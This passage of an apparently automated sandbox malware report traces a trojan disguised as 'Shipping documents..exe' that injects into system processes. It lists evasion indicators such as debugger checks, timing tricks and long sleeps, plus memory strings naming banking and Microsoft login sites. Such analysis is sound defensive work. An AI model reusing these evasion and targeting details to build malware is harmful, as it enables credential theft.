                Source: Binary string: srdelayed.pdbGCTL source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: Shipping documents..exeStatic PE information: real checksum: 0xa961f should be: 0x14c9b5
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00448A0E push esi; ret 0_2_00448A10
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416096 push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168B9 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160BB push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416970 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041692F push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004049B6 push cs; iretd 2_2_004049BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032E0 push eax; ret 2_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415A90 push ds; retf 2_2_00415A93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041938B push ecx; retf 2_2_004193EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411BB6 push ecx; retf 2_2_00411BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004065E5 push cs; ret 2_2_004065F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E33 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D6C1 push ebp; retf 2_2_0040D6CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E91 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05305D59 push ecx; ret 4_2_05305D97
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_053145B0 push eax; ret 4_2_053145DE
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05314DAE push 49A0F8CEh; ret 4_2_05314E07
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0531458B push eax; ret 4_2_053145DE
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05305DE5 push ecx; ret 4_2_05305D97
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05305CDD push ecx; ret 4_2_05305D97
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05313F85 push ds; retf 4_2_05313F88
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05314E24 push 49A0F8CEh; ret 4_2_05314E07
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05314E65 push 49A0F8CEh; ret 4_2_05314E07
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05302EAB push cs; iretd 4_2_05302EAF
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Shipping documents..exeAPI/Special instruction interceptor: Address: 3EB5E9C
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\ktmutil.exeWindow / User API: threadDelayed 1951Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeWindow / User API: threadDelayed 8023Jump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87180
                Source: C:\Users\user\Desktop\Shipping documents..exeAPI coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036Thread sleep count: 1951 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036Thread sleep time: -3902000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036Thread sleep count: 8023 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036Thread sleep time: -16046000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep time: -58500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0299C810 FindFirstFileW,FindNextFileW,FindClose,6_2_0299C810
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552^
                Source: 283026M3L.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 283026M3L.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 283026M3L.6.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 283026M3L.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696487552|UE
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - HKVMware20,11696487552]
                Source: 283026M3L.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .co.inVMware20,11696487552d
                Source: 283026M3L.6.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2742161906.0000026C9564C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696487552x
                Source: 283026M3L.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 283026M3L.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 283026M3L.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 283026M3L.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.comVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,1169648755
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 283026M3L.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 283026M3L.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 283026M3L.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 283026M3L.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 283026M3L.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 283026M3L.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 283026M3L.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,1169648
                Source: FuFneNIzDsF.exe, 00000008.00000002.4566944352.000000000124F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                Source: 283026M3L.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696487552z
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\Shipping documents..exeAPI call chain: ExitProcess graph end nodegraph_0-86308
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A83 LdrLoadDll,2_2_00417A83
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_03EB6168 mov eax, dword ptr fs:[00000030h]0_2_03EB6168
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_03EB6108 mov eax, dword ptr fs:[00000030h]0_2_03EB6108
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_03EB4AB8 mov eax, dword ptr fs:[00000030h]0_2_03EB4AB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
